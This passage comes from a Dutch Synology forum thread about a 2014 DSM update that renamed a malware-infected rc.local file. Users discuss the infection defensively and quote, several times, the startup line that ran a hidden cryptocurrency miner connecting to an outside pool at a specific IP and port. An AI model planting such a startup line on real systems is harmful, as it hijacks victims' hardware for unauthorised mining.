Auteur Topic: Update naar 5.0-4528 rc.local renamed naar rc.local.bak vanwege malware  (gelezen 13036 keer)

kuba

  • Gast
Re: Update naar 5.0-4528 rc.local renamed naar rc.local.bak vanwege malware
« Reactie #15 Gepost op: 24 oktober 2014, 12:32:14 »
@JSSL
Dan zou ik wel eens willen zien wat er in rc.local.bak staat.

In een draadje ergens hierboven zegt JSSL

Dit stond er in de rc.local: /var/run/httpd-log.pid -B -q -o stratum+tcp://93.174.95.67:3340

/var/run/httpd-log.pid is een verwijzing naar Miner software.

Offline Birdy

  • Global Moderator
  • MVP
  • *
  • Bedankjes
  • -Gegeven: 1399
  • -Ontvangen: 8046
  • Berichten: 44.177
  • Fijne feestdagen.......
    • Truebase
Re: Update naar 5.0-4528 rc.local renamed naar rc.local.bak vanwege malware
« Reactie #16 Gepost op: 24 oktober 2014, 12:38:58 »
Overheen gekeken dus...  :oops:
DAT is inderdaad een zeer goede reden voor DSM om die te renamen.  8)


CS406      DSM 2.0-0731    DS508      DSM 4.0-2265      DS411+II  DSM 6.2.4-25556-8   DS115J    DSM 7.1.1-42962-5   DS918+    DSM 6.2.4-25556-8
DS107+     DSM 3.1-1639    DS411slim  DSM 6.2.4-25556   DS213J    DSM 6.2.4-25556-7   DS1515+   DSM 6.2.4-25556-8   DS220+    DSM 7.2.2-72806-2
DS107+     DSM 3.1-1639    DS111      DSM 5.2-5967-9    DS413J    DSM 6.2.3-25426-2   DS716+II  DSM 7.2.2-72806-2   RT2600ac  SRM 1.3.1-9346-12
BeeDrive   1TB             BeeServer  BSM 1.2-65567                                                                 MR2200ac  SRM 1.3.1-9346-12

Ben(V)

  • Gast
Re: Update naar 5.0-4528 rc.local renamed naar rc.local.bak vanwege malware
« Reactie #17 Gepost op: 24 oktober 2014, 12:43:37 »
Ben nu wel nieuwsgierig wat hij zou doen als er zowel een bitcone miner als een optware startup in rc.local zou staan.

Overigens blijf ik erbij dat derde partijen niets te zoeken hebben in rc.local
Als je daar iets kunt opstarten zit je heel vroeg in het bootproces en heb je veel te veel mogelijkheden om nare dingen uit te halen.

Is tegenwoordig helemaal niet meer nodig sinds Synology actief het gebruik van externe package ondersteund.

Offline Briolet

  • Global Moderator
  • MVP
  • *
  • Bedankjes
  • -Gegeven: 180
  • -Ontvangen: 2680
  • Berichten: 16.584
Re: Update naar 5.0-4528 rc.local renamed naar rc.local.bak vanwege malware
« Reactie #18 Gepost op: 24 oktober 2014, 12:57:15 »
ik zag dit bericht een tikkeltje laat, maar ik moet hier even opmerken dat /etc/rc.local op zich geen ongebruikelijk iets is.

Misschien niet ongebruikelijk, maar bij TS staat er:
Citaat
/var/run/httpd-log.pid -B -q -o stratum+tcp://93.174.95.67:3340

En vooral de link naar: 93.174.95.67 is verdacht. En als ik dat IP bekijk, dan behoort hij tot :"Ecatel Ltd, P.o.box 19533, 2500 Cm Den Haag, Netherlands"

Ik weet niet wat dat voor firma is, maar van de laatste 5 SSH aanvallen op mijn NAS kwamen er 3 vanaf een IP adres dat tot Ecatel behoort. (Ik heb al 3 IP reeksen van die firma geblokkeerd).
  • Mijn Synology: DS415+
  • HDD's: 3x 3TB in SHR
  • Extra's: DS212J, RT1900ac

kuba

  • Gast
Re: Update naar 5.0-4528 rc.local renamed naar rc.local.bak vanwege malware
« Reactie #19 Gepost op: 24 oktober 2014, 13:02:02 »
Ben nu wel nieuwsgierig wat hij zou doen als er zowel een bitcone miner als een optware startup in rc.local zou staan.

Overigens blijf ik erbij dat derde partijen niets te zoeken hebben in rc.local
Als je daar iets kunt opstarten zit je heel vroeg in het bootproces en heb je veel te veel mogelijkheden om nare dingen uit te halen.

Is tegenwoordig helemaal niet meer nodig sinds Synology actief het gebruik van externe package ondersteund.


Als een check wordt gedaan op de aanwezigheid van de string httpd-log.pid in het bestand, wordt de rc.local aan de kant gezet, ongeacht wat er verder nog in staat, want zo belangrijk is dat bestand verder niet.

Ik vind je overweging m.b.t. wel of niet rc.local op een Syno eerlijk gezegd verder niet zo spannend.
Ik maak me er meer zorgen over dat een externe partij in staat is om root te krijgen op een Syno systeem, want dan kan je overal en altijd grapjes uithalen, niet alleen in de /etc/rc.local.



kuba

  • Gast
Re: Update naar 5.0-4528 rc.local renamed naar rc.local.bak vanwege malware
« Reactie #20 Gepost op: 24 oktober 2014, 13:03:51 »

ik zag dit bericht een tikkeltje laat, maar ik moet hier even opmerken dat /etc/rc.local op zich geen ongebruikelijk iets is.

Niet ongebruikelijk, maar bij TS staat er:
Citaat
/var/run/httpd-log.pid -B -q -o stratum+tcp://93.174.95.67:3340

ja Briolet, dat had ik gezien.  :idea:

Offline JSSL

  • Bedankjes
  • -Gegeven: 9
  • -Ontvangen: 9
  • Berichten: 172
Re: Update naar 5.0-4528 rc.local renamed naar rc.local.bak vanwege malware
« Reactie #21 Gepost op: 24 oktober 2014, 13:11:36 »
@Birdy, zie de 3e post van dit topic. ;)
  • Mijn Synology: Ds1618+
  • HDD's: 6x WD 8tb


 

Synology DSM 5.0: update zonder dataverlies?

Gestart door cloudstrifeBoard Synology DSM 5.1 en eerder

Reacties: 6
Gelezen: 3355
Laatste bericht 14 maart 2014, 14:10:41
door Wyodor
locale mappen niet zichtbaar in filestation JAVA update helpt niet

Gestart door beetlebusBoard Synology DSM 5.1 en eerder

Reacties: 0
Gelezen: 1521
Laatste bericht 17 januari 2014, 14:30:28
door beetlebus
DS Video werkt niet meer na update?

Gestart door Lucas79Board iOS Apps (iPhone, iPad en iPod)

Reacties: 7
Gelezen: 4150
Laatste bericht 26 januari 2014, 14:42:15
door Birdy
DS118 gaat na laatste update niet meer in slaapstand, blijft continu aan.

Gestart door racinfoBoard NAS hardware vragen

Reacties: 7
Gelezen: 1974
Laatste bericht 08 augustus 2019, 14:08:04
door Birdy
Firmware update - SRM 1.2.4 - 8081 - *1* [patch]

Gestart door BabyloniaBoard Synology Router

Reacties: 8
Gelezen: 1883
Laatste bericht 15 oktober 2020, 14:39:42
door reinos